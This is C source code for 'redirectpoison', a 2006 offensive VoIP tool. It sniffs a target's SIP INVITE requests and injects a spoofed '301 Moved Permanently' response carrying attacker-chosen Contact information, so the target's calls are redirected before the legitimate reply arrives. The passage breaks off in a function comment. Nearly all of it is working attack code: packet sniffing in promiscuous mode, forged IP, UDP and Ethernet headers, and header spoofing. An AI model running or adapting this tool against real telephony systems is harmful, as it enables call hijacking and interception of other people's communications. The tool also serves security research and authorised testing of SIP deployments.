//-------------------------------------------------------------------------------
//
//  redirectpoison.c - Command line tool to poison a 
//               a SIP requestor (i.e. UAC) with SIP Redirect
//               response. A Redirect response is a 3xx series
//               response (e.g. 301 moved permanently). The
//               goal is to poison the requestor with a 3xx
//               series "final response" prior to the legitimate
//               final response to the request (e.g. 200 OK).
//
//               This tool presumes the host from which the
//               tool is executed is not MITM in the signaling
//               stream. However, it presumes the host from
//               which the tool is executed is capable of sniffing
//               SIP messages (e.g. the host is connected to a
//               hub through which SIP signaling flows).
//
//               Presently, the tool supports poisoning a SIP
//               INVITE message (RFC 3261) with a 301
//               (i.e. Permanently Moved) redirect response.
//               The tool replies to an INVITE from the targeted
//               source if and only if the To-URI in the To header
//               is not already equal to the poisoned contact
//               information specified to the tool on the
//               command line.
//
//               This tool uses protocol header parameters
//               from a sniffed SIP request message matching
//               the poisoning filter to spoof the requester into
//               imbibing the poison.
//
//    Copyright (C) 2006  Mark D. Collier/Mark O'Brien
//
//    This program is free software; you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation; either version 2 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program; if not, write to the Free Software
//    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//
// Author: Mark D. Collier/Mark O'Brien   10/16/2006   v1.1
//	 Mark D. Collier/Mark O'Brien    09/14/2006  v1.0
//         www.securelogix.com - mark.collier@securelogix.com
//         www.hackingexposedvoip.com
//
//-------------------------------------------------------------------------------

#include "hack_library.h"
#include "redirectpoison.h"

int  main ( int argc, char *argv[] ) {

//
//      Declarations and initializations
//
    
    int i, j;    
    int bytesWritten;
    int ipPacketSize;
    int sniffedSIPMsgLen;
    int targetSrcPort = 0;
        
    unsigned int offset_to_ip_hdr  = LIBNET_ETH_H;
    unsigned int offset_to_udp_hdr = LIBNET_ETH_H + LIBNET_IPV4_H;
    unsigned int offset_to_sip_msg = LIBNET_ETH_H + LIBNET_IPV4_H + LIBNET_UDP_H;
    
    unsigned int start;
    unsigned int end;
    
    unsigned int targetSrcIPv4Addr        = 0;
    unsigned int hostIPv4Addr             = 0;
    unsigned int contactInfoLen           = 0;
    unsigned int redirectpoisonSIPMsgLen  = 0;
    
    char targetSrcIPv4AddrDotted [16];
    char pcap_errbuf             [PCAP_ERRBUF_SIZE];
    char libnet_errbuf           [LIBNET_ERRBUF_SIZE];
    char psRedirectpoisonSIPMsg  [SIP_PAYLOAD_LEN_MAX];
    char psSniffedSIPMsg         [SIP_PAYLOAD_LEN_MAX];
        
    char *psDevice              = NULL;
    char *psTargetSrcIPv4Addr   = NULL;
    char *psContactInfo         = NULL;
    char *psTempIPv4Addr        = NULL;
    
    const u_char *ppacket       = NULL;
    const u_char *psip_msg      = NULL;
    
    bool bFound                          = false;
    bool bReceivedSIPRequestFromTarget   = false;
    bool bTransmitPoisonedResponse       = false;

    struct pcap_pkthdr *ppcap_pkthdr     = NULL;
    struct pcap_pkthdr pcap_header;
        
    struct libnet_ethernet_hdr *eth_hdr  = NULL;
    struct libnet_ipv4_hdr *ip_hdr       = NULL;
    struct libnet_udp_hdr *udp_hdr       = NULL;
        
    struct bpf_program compiled_pcap_filter;

    libnet_ptag_t udp_tag    = 0;
    libnet_ptag_t ip_tag     = 0;
    libnet_ptag_t ether_tag  = 0;
    
    struct ifreq ifreq;
    unsigned char deviceMAC[IFHWADDRLEN];

    signal ( SIGTERM, catch_signals );
    signal ( SIGINT, catch_signals  );    

//
//      Check the number of command line parms entered.
//
    if ( argc < 5 ) {
        printf( "\nError: 4 command line parameters are mandatory\n" );
        usage ( EXIT_FAILURE );
    };

//
//  Parse the command line.
//

    while ( ( opt = getopt ( argc, argv, "vh?" ) ) != EOF ) {
        switch ( opt ) {
           case 'v':
                bVerbose = true;                // Verbose option.
                break;
            case 'h':
            case '?':
                usage( EXIT_SUCCESS );          // Usage.
                break;
        }
    }

//
//  getopt permutes the order of the parms in argv[] placing non-optional parms
//  at the end of argv. optind should be the index of the 1st mandatory non-optional
//  parm in argv[] and there must be exactly 6 non-optional mandatory parms:
//

    if ( optind != ( argc - 4 ) ) {
        printf( "\nError: 4 command line parameters are mandatory\n" );
        usage ( EXIT_FAILURE );
    }

//
//  Ethernet device.
//

    psDevice = argv[optind++];

//
//  Poison the response to SIP Requests from this targeted source IP address.
//  Str2IP returns the numeric IP address in network byte order.
//

    psTargetSrcIPv4Addr = argv[optind++];
    psTempIPv4Addr = strdup( psTargetSrcIPv4Addr );

    if ( Str2IP ( psTempIPv4Addr, &targetSrcIPv4Addr ) != EXIT_SUCCESS ) {
        printf ( "\ntarget IPv4 addr invalid: %s\n",
                 psTargetSrcIPv4Addr );
        free ( psTempIPv4Addr );
        usage ( EXIT_FAILURE );
    }

   snprintf ( targetSrcIPv4AddrDotted, 15, psTargetSrcIPv4Addr );

   free ( psTempIPv4Addr );
   psTempIPv4Addr = NULL;

//
//  Targeted source port number.
//

    targetSrcPort = atoi ( argv[optind++] );
    if ( targetSrcPort  < 0 || targetSrcPort  > 65535 ) {
        printf ( "\nTarget Source Port range = 0 to 65535\n" );
        usage ( EXIT_FAILURE );
    }
    
//
//  The poison (i.e. contact information) to supply in the 3xx response
//
    
    psContactInfo = argv[optind++];
    contactInfoLen = strlen ( psContactInfo );
    psContactUserPart = duplicateUserPartOfUri ( psContactInfo );
    
//
//  Print summary of parms.
//

    printf ( "\n%s\n", __REDIRECTPOISON_VERSION );
    printf ( "%s\n",   __REDIRECTPOISON_DATE    );

    printf ( "\ntarget IPv4 addr:port = %s:%u\n",
             targetSrcIPv4AddrDotted, targetSrcPort  );
    
    printf ( "\nredirect response contact info: %s\n", psContactInfo );
    
    if ( !psContactUserPart ) {
        printf ( "\nWarning: The contact poison specified is expected to contain"
                 "\n         a SIP URI. Although the user part of a URI is"
                 "\n         optional, it is needed by this tool to determine"
                 "\n         if a target SIP request has already been poisoned."
                 "\n         The tool does not transmit a poisoned SIP redirect"
                 "\n         response for a SIP request already carrying poison."
                 "\n         No URI 'user' part has been found in the poison."
                 "\n         The pre-poisoning assessment logix is disabled!"
                 "\n" );
    } else {
        printf ( "\npre-poisoning assessment logix is dependent upon finding"
                 "\nthis URI 'user' part in the Request-URI or To-URI of target"
                 "\nSIP requests:  %s\n",
                 psContactUserPart );
    }

    if ( bVerbose ) {
        printf ( "\nVerbose mode" );
    }

//
//  Initialize the libnet library in preparation for spoofing. Root privileges are required.
//  
//  Note: it has been demonstrated that the order in which ethernet interfaces appear
//            in your route table might override your attempt to output spoofed packets
//            over a certain ethernet interface. For example, the device specified in the 
//            call to libnet_init() below might prove irrelevant.
//
//            For example, suppose the user executing this tool specified eth2 on the
//            command line. However, suppose eth0 is also up, eth0 was brought into
//            service earlier than eth2, and eth0 also provides a route to the targeted
//            destination device. In that case, eth0 will appear in the route table before
//            eth2. The poison packets are transmitted out eth0 instead of eth2!!!!
//            The problem in this example can be solved in one of the following ways:
//
//                1) specify eth0 instead of eth2 on the command line
//                2) Take eth0 down. Its entry is automatically removed from the route table
//                3) Take eth0 down and then bring it up. This changes the order
//                     of the interfaces in the route table
//
//           If may not matter to you which ethernet interface that poisoned redirect
//           messages are transmitted on as long as they reach the intended destination
//           ahead of a legitimate response.
//

printf ("\n __REDIRECTPOISON_LIBNET_PROTOCOL_LAYER = %u \n", 
         __REDIRECTPOISON_LIBNET_PROTOCOL_LAYER );

#if __REDIRECTPOISON_LIBNET_PROTOCOL_LAYER == __REDIRECTPOISON_LIBNET_IP

    l = libnet_init (
            LIBNET_RAW4,        // injection type
            psDevice,           // network interface (i.e. see note above)
            libnet_errbuf );    // errbuf
            
    printf ( "\nWill inject spoofed audio at IP layer\n" );

#elif __REDIRECTPOISON_LIBNET_PROTOCOL_LAYER == __REDIRECTPOISON_LIBNET_ETHERNET
    
    l = libnet_init(
            LIBNET_LINK,        // injection type
            psDevice,           // network interface
            libnet_errbuf );    // errbuf 
    
    printf ( "\nWill inject spoofed audio at Ethernet layer\n" );

#else
    
    printf ( "\nInvalid Compiler PreProcessor value was assigned to: \n"
             "\n__REDIRECTPOISON_LIBNET_PROTOCOL_LAYER. Check redirectpoison.h\n" );
    CleanupAndExit ( EXIT_FAILURE );
    
#endif
    
    if ( l == NULL ) {
        fprintf ( stderr, "libnet_init() failed: %s\n", libnet_errbuf );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return
    }

//
//  It's time to sniff the specified network interface and try to capture
//  a SIP request commensurate with the poison filter    
//
    
    pcap_errbuf[ 0 ] = '\0';

    h_pcap_live_sip =
        pcap_open_live (
            psDevice,                           // interface to open
            65535,                              // max. # of bytes to capture
            __REDIRECTPOISON_PROMISCOUS_MODE,   // open in promiscous mode
            0,                                  // wait forever for 1 packet.
            pcap_errbuf );                      //  where an error string is stored
    
    if ( h_pcap_live_sip == NULL ) {
        fprintf ( stderr,
                  "\nCouldn't open interface to sniff SIP signaling %s: %s\n",
                  psDevice, pcap_errbuf );
        CleanupAndExit ( EXIT_FAILURE );
    }
    
    if ( pcap_errbuf[ 0 ] != '\0' ) {
        //  pcap has returned a warning instead of an error
        fprintf ( stderr,
                  "\npcap warning: %s\n", pcap_errbuf );
    }

//
//  Create a libpcap filter to restrict the capture to the UDP packets
//  specified by command line options
//
//  The filter is a string of this form:
//     "src host <ip dotted addr> and udp src port <port>"
//
    
    char pcap_filter[ 300 ];  //  Provide more than enough space for the filter ( i.e.  2x)
    
    pcap_filter[0] = '\0';    //  NUL string
    
    rc = snprintf ( pcap_filter, sizeof( pcap_filter ),
                    "src host %s and "
                    "udp src port %u",
                    psTargetSrcIPv4Addr,
                    targetSrcPort );

    if ( rc >= sizeof ( pcap_filter ) ) {
        printf ( "\nError: pcap filter string was limited at %u characters. "
                 "Expected room to spare.\n", sizeof ( pcap_filter ) - 1 );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
    }
    
    if ( rc < 0 ) {
        printf ( "\nError: pcap filter string problem. Size of string = %u\n",
                 sizeof ( pcap_filter ) - 1 );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
    }
    
    rc = pcap_compile ( h_pcap_live_sip,
                        &compiled_pcap_filter,
                        pcap_filter,
                        0,                      // don't optimize filter
                        0xFFFFFF00 );           // netmask (i.e. 255.255.255.0)

    if ( rc < 0 ) {
        pcap_perror ( h_pcap_live_sip, "\nError: pcap_compile filter : " );
        printf ( "\n" );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
    }
    
    rc = pcap_setfilter ( h_pcap_live_sip, &compiled_pcap_filter );
    
    if ( rc < 0 ) {
        pcap_perror ( h_pcap_live_sip, "\nError: pcap_setfilter : " );
        printf ( "\n" );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
    }
    
//
//   program pointed by the bpf_program may be freed after the program 
//   has been installed by a call to pcap_setfilter
//
    
    pcap_freecode( &compiled_pcap_filter );
    
    if ( bVerbose ) {
        printf ( "\npcap filter installed for live sip signaling "
                 "sniffing: %s\n", pcap_filter );
    }

//
//  The pcap manual states that pcap_next( ) is always blocking. Perhaps
//  this statement can be extrapolated to use of pcap_next_ex( ) as well.
//  Just to be safe, explicitly set the pcap descriptor to blocking.
//
    
    pcap_setnonblock( h_pcap_live_sip,
                      0,                   // 0 = blocking
                      pcap_errbuf );
    
    rc = pcap_getnonblock( h_pcap_live_sip, pcap_errbuf );

    if ( bVerbose ) {
        if ( rc == 0 ) {
            printf ( "\npcap live %s interface is blocking\n\n", psDevice );
        } else {
            if ( rc == -1 ) {
                printf ( "\npcap getnonblock( ) error: %s\n\n", pcap_errbuf );
            } else {
                printf ( "\npcap live %s interface is non-blocking\n\n",
                         psDevice );
            }
        }
    }
        
    fflush ( stdout );
    
//
//  Raise process prioriy to max. in order to try to submit the poisoned
//  redirect response to the source of the SIP Request before the
//  destination can reply to the SIP Request.
//
    
    int process_priority = 0;
    
    process_priority = getpriority( PRIO_PROCESS, 0 /* this process */ );
   
    printf ( "\n\nProcess priority was = %d\n", process_priority );
    
    process_priority = -20;   // -20 to 19: max (i.e. best) priority = -20, normal = 0
    
    rc = setpriority ( PRIO_PROCESS, 0 /* this process */, process_priority );
    
    if ( rc == 0 ) {
       printf ( "\nProcess Priority set to: %d (i.e. highest priority)\n",
                getpriority( PRIO_PROCESS, 0 /* this process */ ) );
    } else {
       printf ( "\nError: Could not set process priority to: %d\n",
                 process_priority );
        CleanupAndExit ( EXIT_FAILURE );        // control does not return here
    }

//
//  Redirectpoisoning infinite loop.
//
//  The output of each sip redirect poison message is triggered
//  by the reception of a sip request message matching the
//  characteristics defined by the redirectpoison command line
//  parms.
//
//  However, do not inject redirectpoison for INVITE requests
//  from the target source whose To-URI information already
//  carries the poison.
//
    
    while ( true ) {

        bReceivedSIPRequestFromTarget = false;

        while ( !bReceivedSIPRequestFromTarget ) {
            
            //
            //  FIXME:  One outstanding question is whether repeated calls to
            //                   pcap_next_ex( ) result in additional memory being
            //                   consumed. Or, is only - at most - one packet's worth of
            //                   memory consumed despite repeated calls to pcap_next_ex( )?
            //
            //                   The working presumption until this question can be
            //                   answered is that repeated calls to pcap_next_ex( ) result
            //                   in only one packet's worth of memory being consumed.
            //                   (i.e. the pcap_next_ex( ) routine releases memory for
            //                   the packet "returned" in a prior call and allocates
            //                   memory as needed for the next packet).
            //
            
            ppacket = NULL;
            
            rc = pcap_next_ex ( h_pcap_live_sip, &ppcap_pkthdr, &ppacket );
        
            if ( rc == -1 ) {
                pcap_perror ( h_pcap_live_sip,
                              "\nError: while attempting to sniff "
                              "sip signaling : " );
                printf ( "\n" );
                CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
            }
            
            if ( rc == 0 ) {
                printf ( "\nTimeout reported by pcap_next_ex( ), but"
                         "no timeout was requested.\n" ); 
                CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
            }

            numPacketsRead++;
            
            //
            //  To be eligible to be evaluated, the received UDP message
            //   must be at least long enough to contain a SIP INVITE request.
            //
            
            if ( ppcap_pkthdr->caplen >=
                 ( offset_to_sip_msg + SIP_REQUEST_LEN_MIN ) ) {

                psip_msg = ppacket + offset_to_sip_msg;
                
                //  FIXME: This version of the tool assumes properly formatted SIP messages
                    
                if ( ( psip_msg[0] == 'I' || psip_msg[0] == 'i' ) &&
                     ( psip_msg[1] == 'N' || psip_msg[1] == 'n' ) &&
                     ( psip_msg[2] == 'V' || psip_msg[2] == 'v' ) &&
                     ( psip_msg[3] == 'I' || psip_msg[3] == 'i' ) &&
                     ( psip_msg[4] == 'T' || psip_msg[4] == 't' ) &&
                     ( psip_msg[5] == 'E' || psip_msg[5] == 'e' ) ) {
                    numInviteRequestsRead++;
                    bReceivedSIPRequestFromTarget = true;
                }
            }
        } // end while ( !bReceivedSIPRequestFromTarget )

        //
        //  The length of the SIP payload of the sniffed SIP message better be <
        //  SIP_PAYLOAD_LEN_MAX  
        //

        sniffedSIPMsgLen = ppcap_pkthdr->caplen - offset_to_sip_msg;
        
        if ( ( sniffedSIPMsgLen ) >= SIP_PAYLOAD_LEN_MAX ) {
            printf ( "\nError: sniffed SIP request msg is too long: %u bytes\n",
                     sniffedSIPMsgLen );
            CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
        }
        
        //
        //  Now it is safe to copy the SIP payload into reserved storage.
        //  We do this so we may null terminate the SIP payload
        //  (i.e. convert it to a string). This permits us to employ string
        //  functions on the payload.
        // 

        strncpy ( psSniffedSIPMsg,
                  ppacket + offset_to_sip_msg,
                  sniffedSIPMsgLen );
        
        psSniffedSIPMsg[sniffedSIPMsgLen] = '\0';

        bTransmitPoisonedResponse =
            synthesizeRedirectPoisonResponse ( psSniffedSIPMsg,
                                               psContactInfo,
                                               psRedirectpoisonSIPMsg );

        if ( bTransmitPoisonedResponse ) {            
                        
            redirectpoisonSIPMsgLen = strlen ( psRedirectpoisonSIPMsg );

            //
            //      Create/Reuse the libnet UDP packet.
            //
        
            udp_hdr = ( struct libnet_udp_hdr * ) ( ppacket + offset_to_udp_hdr );
    
            udp_tag = libnet_build_udp (
                        ntohs ( udp_hdr->uh_dport ),         // response source port = dest port of request
                        ntohs ( udp_hdr->uh_sport ),         // response destination port = src port of request
                        LIBNET_UDP_H +
                          redirectpoisonSIPMsgLen,           // total UDP packet length
                        0,                                   // let libnet compute checksum
                        (u_int8_t *) psRedirectpoisonSIPMsg, // udp payload
                        redirectpoisonSIPMsgLen,             // udp payload length
                        l,                                   // libnet handle
                        udp_tag );                           // ptag - 0 = build new, !0 = reuse
    
            if ( udp_tag == -1 ) {
                printf ( "Looping: Can't build  UDP packet: %s\n",
                         libnet_geterror ( l ) );
                CleanupAndExit ( EXIT_FAILURE );   //  control does not return
            }
            
            // 
            //  Note: libnet seems to have problems computing correct UDP checksums
            //             reliably. Since the UDP checksum is optional, it can be set to zeros
            //             (i.e. see the call to libnet_build_udp above) and a call to 
            //             libnet_toggle_checksum ()  can be used to disable the checksum
            //             calculation by libnet
            //
            
            libnet_toggle_checksum ( l, udp_tag, LIBNET_OFF );
        
            //
            //  Update the libnet IP header by spoofing the necessary values from the
            //  received packet's IP header.
            //
        
            ip_hdr = ( struct libnet_ipv4_hdr * ) ( ppacket + offset_to_ip_hdr );
            ipPacketSize = LIBNET_IPV4_H + LIBNET_UDP_H + redirectpoisonSIPMsgLen;        
    
            ip_tag = libnet_build_ipv4 (
                    ipPacketSize,               // size
                    ip_hdr->ip_tos,             // ip tos
                    ntohs ( ip_hdr->ip_id ),    // ip id
                    ntohs ( ip_hdr->ip_off ),   // fragmentation bits
                    ip_hdr->ip_ttl,             // ttl
                    IPPROTO_UDP,                // protocol
                    0,                          // let libnet compute checksum
                    ip_hdr->ip_dst.s_addr,      // source addr of response = destination addr of request
                    ip_hdr->ip_src.s_addr,      // destination addr of response = srouce addr of request
                    NULL,                       // payload
                    0,                          // payload length
                    l,                          // libnet context
                    ip_tag );                   // ptag - 0 = build new, !0 = reuse
                                
            if ( ip_tag == -1 ) {
                printf ( "Looping: Can't build IP header: %s\n",
                         libnet_geterror ( l ) );
                CleanupAndExit ( EXIT_FAILURE );
            }

#if __REDIRECTPOISON_LIBNET_PROTOCOL_LAYER == __REDIRECTPOISON_LIBNET_ETHERNET
    
            //
            //  Update the Ethernet header by spoofing the necessary values from
            //  the received packet's Ethernet header
            //
    
            eth_hdr = ( struct libnet_ethernet_hdr * ) ppacket;
            
            ether_tag = libnet_build_ethernet (
                    (u_int8_t *) &(eth_hdr->ether_shost), // dest mac of response = src mac of request
                    (u_int8_t *) &(eth_hdr->ether_dhost), // source mac or response = dest mac of request
                    ETHERTYPE_IP,                         // type upper layer protocol
                    NULL,                                 // payload
                    0,                                    // payload size
                    l,                                    // libnet handle
                    ether_tag );                          // ptag - 0 = build new, !0 = reuse
            
            if ( ether_tag == -1 ) {
                printf( "Can't build standard ethernet header: %s\n",
                        libnet_geterror( l ) );        
                CleanupAndExit( EXIT_FAILURE );
            }
    
#endif

            //
            //      Write the packet.
            //

            bytesWritten = libnet_write ( l );
            if ( bytesWritten == -1 ) {
                fprintf ( stderr, "Write error: %s\n", libnet_geterror ( l ) );
                CleanupAndExit ( EXIT_FAILURE );   //  control does not return
            }

            //
            //  Make sure the number of written bytes jives with what we expect.
            //

            if ( bytesWritten < ipPacketSize ) {
                fprintf ( stderr,
                         "Write error: libnet only wrote %d of %d bytes",
                         bytesWritten,
                         ipPacketSize );
                CleanupAndExit ( EXIT_FAILURE );   //  control does not return
            }
            
            numSIPRequestsPoisoned++;
            
        } // if ( bProceedWithPoisonedResponse )
    } //  end redirect poisoning loop (i.e. infinite loop )

    printf ( "\n\nError: exited infinte loop\n" );

    CleanupAndExit ( EXIT_FAILURE );
        
} // end main


//-----------------------------------------------------------------------------
//
//  synthesizeRedirectPoisonResponse
//
//  Need to copy some of the SIP request message content
//  into the SIP 3xx Series redirectpoison response. Some
//  of the headers might need to be modified
//  (e.g. To header).
//
//  If the SIP request message already appears to exhibit
//  prior poisoning, then the calling function is infomed
//  not to transmit a redirect poison response.
//
//  FIXME: this version of the tool does not handle abbreviated header names.
//  FIXME: this version of the tool presumes a properly formatted SIP message. 
//  FIXME: this request message parsing is going was coded quickly and
//                   can probably stand to be optimized for accuracy and execution speed.
//
//  Inputs:
//     psSniffedSIPMsg = pointer to the SIP request message string
//     psRedirectpoisonSIPMsg =
//          pointer to the SIP Redirect response message
//          buffer that is large enough to hold the max. 
//          length redirect response message (i.e. in the 
//          form of a string). 
//     psContactInfo = pointer to a string with the contact
//         poison entered by the tool user on the command
//         line.
//
//  Outputs:
//    The string pointed to by psRedirectpoisonSIPMsg.
//    The string pointed by bt psSniffedSIPMsg has
//       been manipulated (e.g. truncated to exclude any
//       SDP message payload).
//
//  Return:
//    true  - if the redirect poison response should be
//                transmitted
//    false - if the SIP request message should be silently
//                discarded and the tool to remain quiet.
//
//-----------------------------------------------------------------------------

bool synthesizeRedirectPoisonResponse ( char *psSniffedSIPMsg,
                                        char *psContactInfo,
                                        char *psRedirectpoisonSIPMsg ) {
    
//
//  Most headers in the SIP request message will be excluded
//  from the poisoned redirect response message. A few headers
//  are required to be copied as-is from the request to the response.
//  One header in particluar (i.e. the To header) needs to be
//  checked to see if its content already exhibits poisoning. 
//

    bool bFound                  = false;
    bool bCopyHeader             = false;
    bool bAllSipHeadersProcessed = false;

    char *psEndOfSIPHeaders      = NULL;
    char *psStartLine            = NULL;
    char *psEndLine              = NULL;
    char *psHeaderName           = NULL;
    char *psHeaderNameEnd        = NULL;
    
    unsigned int start;
    unsigned int end;
    unsigned int headerNameLen   = 0;
                                
    //
    //  Initialize the sip redirectpoison outgoing msg payload
    //        
    
    psRedirectpoisonSIPMsg[0] = '\0';

    sprintf ( psRedirectpoisonSIPMsg, "SIP/2.0 301 Moved Permanently\r\n" );

    //
    //  Scan to the beginning of the SDP message (i.e. the end of the SIP headers).
    //  Contract the SIP request message string to exclude the SDP from further
    //  scans).
    //

    if ( !( psEndOfSIPHeaders = strstr( psSniffedSIPMsg, EOSIPHDRS ) ) ) {
        printf ( "\nError: malformed SIP Request (1)\n" );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
    }

    //
    // Contract SIP request msg string to exclude SDP
    //
    
    *(psEndOfSIPHeaders + 2) = '\0';

    //        
    //  Scan to the end of the SIP message's Request method line
    //  (i.e. the Request method must be the first line of a SIP request message).
    //
    
    if ( !( psEndLine = strstr( psSniffedSIPMsg, EOL ) ) ) {
        printf ( "\nError: malformed SIP Request (2)\n" );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
    }
    
    if ( !processRequestMethodLine ( psSniffedSIPMsg, psEndLine ) ) {
        
        //
        //  The uri on the request method line exactly matches
        //  the poison. We conclude the received SIP request
        //  is the result of a prior successful poisoning.
        //  Do not respond to this message.
        //  
    
        return false;
    }

    //
    //  Adjust Start/End pointers to the first header line
    //  (i.e. the one following the Request method line)
    //

    psStartLine = psEndLine + 2;  // Advance past \r\n ending the request line
    
    if ( !( psEndLine = strstr( psStartLine, EOL ) ) ) {
        printf ( "\nError: malformed SIP Request (3)\n" );
        CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
    }
    
    while ( !bAllSipHeadersProcessed ) {

        //
        //  Find start of non-whitespace in current header line (i.e. start of header name)
        //  Find the colon that terminates the end of a header name
        //  Compare the characters so-bounded with the header names
        //      of special interest.
        //  If the header name is interesting,
        //      then exclude it or modifiy it
        //      else copy that header line to the redirectpoison message as-is
        //
        
        bFound = false;

        //
        //  Scan line for the first non-whitespace character. Presume this is 
        //  the start of the header.
        //
        
        for ( start = 0; start < ( psEndLine - psStartLine + 1 ); start++ ) {
            
            //
            //   current char is not a space, not a formfeed, not a newline, ..etc?
            //
            
            if ( !isspace( psStartLine[start] ) ) {
                bFound = true; // found the start of header name
                break;
            }
        }
     
        if ( !bFound ) {
            printf ( "\nError: malformed SIP Request (4)\n" );
            CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
        }

        psHeaderName = psStartLine + start;
        bFound = false;

        //
        //  Scan line for the colon required to separate the header name from
        //  the header value. Presume the colon appears immediately after
        //  the last character of the header name.
        //
        //  FIXME: the colon separating the header from its value(s) is not
        //                   required to appear immediately after the header name.
        //
        
        for ( end = start + 1; end < ( psEndLine - psStartLine + 1 ); end++ ) {
            if ( psStartLine[end] == ':' )
            {
                bFound = true;
                break;   // found the end of the header name
            }
        }

        if ( !bFound ) {
            printf ( "\nError: malformed SIP Request (5)\n" );
            CleanupAndExit ( EXIT_FAILURE );   //  control does not return here
        }
        
        psHeaderNameEnd = psStartLine + end - 1; // backup from colon
        headerNameLen  = psHeaderNameEnd - psHeaderName + 1;
        
        bCopyHeader = false;

        //
        // Refer to Section 20, RFC 3261 for a table explaining the following
        // constraints the tool shall enforce by the code following these
        // comments:
        //
        // Exclude the following headers in the request from the response:
        //
        // Accept
        // Accept-Encoding
        // Accept-Language
        // Alert-Info
        // Allow
        // Authentication-Info
        // Authorization
        // Max-Forwards
        // Priority
        // Proxy-Authorization
        // Proxy-Require
        // In-Reply-To
        // Record-Route
        // Route
        // Subject
        // Supported
        // WWW-Authenticate
        //
        // Must copy the following headers from the request to the 
        // response:
        //
        // Call-ID
        // CSeq
        // From
        // To (and add a tag to the end if no tag is present)
        // Via
        //
        // The following headers are optional or should appear in certain
        // requests and may appear in responses. We're going to exclude
        // these headers from being copied into the response. However,
        // we're going to include a content length header of zero (i.e. 
        // "Content-Length: 0" in the redirect response. 
        //
        // Call-Info
        // Content-Disposition
        // Content-Encoding
        // Content-Language
        // Content-Length
        // Content-Type
        // Date
        // Mime-Version
        // Organization
        // Reply-To
        // Require                    
        // User-Agent
        //
        // The following headers may originate in a response. We do not
        // include them in our response.
        //
        // Server
        // Warning
        //
        // The purpose of this tool is to spoof Contact headers in a redirect
        // response, so we'll any discard Contact headers found in the 
        // request and supply our own later.
        //
        // Contact
        //
        
        switch ( psHeaderName[0] ) {

            case 'c': 
            case 'C': {
                if ( ( headerNameLen == 4 )                             &&
                     ( psHeaderName[1] == 'S' || psHeaderName[1] == 's' ) &&
                     ( psHeaderName[2] == 'E' || psHeaderName[2] == 'e' ) &&
                     ( psHeaderName[3] == 'Q' || psHeaderName[3] == 'q' ) ) {              
                    bCopyHeader = true;                        
                }
                if ( ( headerNameLen == 7 )                             &&
                     ( psHeaderName[1] == 'A' || psHeaderName[1] == 'a' ) &&
                     ( psHeaderName[2] == 'L' || psHeaderName[2] == 'l' ) &&
                     ( psHeaderName[3] == 'L' || psHeaderName[3] == 'l' ) &&
                     ( psHeaderName[4] == '-' )                          &&
                     ( psHeaderName[5] == 'I' || psHeaderName[5] == 'i' ) &&
                     ( psHeaderName[6] == 'D' || psHeaderName[6] == 'd' ) ) {              
                    bCopyHeader = true;                        
                }
                break;
            }
            
            case 'f': 
            case 'F': {
                if ( ( headerNameLen == 4 )                             &&
                     ( psHeaderName[1] == 'R' || psHeaderName[1] == 'r' ) &&
                     ( psHeaderName[2] == 'O' || psHeaderName[2] == 'o' ) &&
                     ( psHeaderName[3] == 'M' || psHeaderName[3] == 'm' ) ) {              
                    bCopyHeader = true;                        
                }
                break;
            }
                
            case 't': 
            case 'T': {
                if ( ( headerNameLen == 2 ) && 
                     ( psHeaderName[1] == 'O' || psHeaderName[1] == 'o' ) ) {
                    
                    if ( !processToHeader ( psRedirectpoisonSIPMsg,
                                            psStartLine,
                                            psEndLine,
                                            psHeaderNameEnd,
                                            &bCopyHeader ) ) {
                        
                        //
                        //  To header content exactly matches poison.
                        //  Don't transmit a redirect response for this INVITE
                        //  message. It's already carrying poison.
                        //
                        
                        return false;      // Discard this SIP Request msg
                    }
                }
                break;
            }
            
            case 'v': 
            case 'V': {
                if ( ( headerNameLen == 3 )                             &&
                     ( psHeaderName[1] == 'I' || psHeaderName[1] == 'i' ) &&
                     ( psHeaderName[2] == 'A' || psHeaderName[2] == 'a' ) ) {              
                    bCopyHeader = true;                        
                }
                break;
            }
            
            default: {
                ;
            }
        } // end switch ( headerNameLen )
        
        if ( bCopyHeader ) {
            
            // Note: the length is specified in such a manner that snprintf will
            //            be truncated after the \r\n which ends the header's line. 
            //            Since the '\0' does not appear in the source "string" within the 
            //            specified length, snprinf( ) only appends 1 minus the number of
            //            of bytes specified and ends the destination string with '\0'
            //            see man snprintf. This achieves the desired result.
            
            snprintf ( psRedirectpoisonSIPMsg + strlen ( psRedirectpoisonSIPMsg ),
                       psEndLine - psStartLine + 3,
                       "%s",
                       psStartLine );
        }
        
        psStartLine = psEndLine + 2;  // bypass the \r\n at the end of the header line
        
        if ( !( psEndLine = strstr ( psStartLine, EOL ) ) ) {
            bAllSipHeadersProcessed = true;
        }
    } // end while ( !bAllSipHeadersProcessed )
    
    //        
    //  Complete the SIP redirectpoison response by:
    //      o   adding a Content-Length header equal to 0
    //      o   copying bogus redirect poison Contact Header lines
    //           into the outgoing message
    //

    sprintf ( psRedirectpoisonSIPMsg +
                strlen ( psRedirectpoisonSIPMsg ),
              "Content-Length: 0\r\n"
              "Contact: %s\r\n"
              "\r\n",
              psContactInfo );

    
    return true;
    
} // end synthesizeRedirectPoisonResponse


//-----------------------------------------------------------------------------
//
//  processRequestMethodLine
//
//  The Request Method Line must be the first line
//  of a SIP Request Message. It contains a request
//  uri. Check to see if the 'user' part of the request
//  uri already exhibits poisoning by comparing it
//  to the 'user' part of the poisoned entered by the
//  tool user on the command line.
//
//  o  If the poison contact information entered on the
//          command line included a uri with a 'user' part 
//          then
//              If the uri on the Request method line contains
